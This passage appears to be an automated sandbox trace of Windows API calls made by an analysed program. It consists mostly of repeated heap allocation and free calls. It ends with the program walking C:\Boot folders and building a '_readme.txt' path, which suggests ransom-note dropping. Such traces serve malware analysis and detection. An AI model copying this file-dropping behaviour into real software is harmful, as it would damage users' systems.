lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.509] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.510] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.516] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.516] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.517] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0227.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.517] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.517] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.517] PathFindFileNameW (pszPath="") returned="" [0227.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.517] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.518] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.518] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.518] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.518] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0227.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.518] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 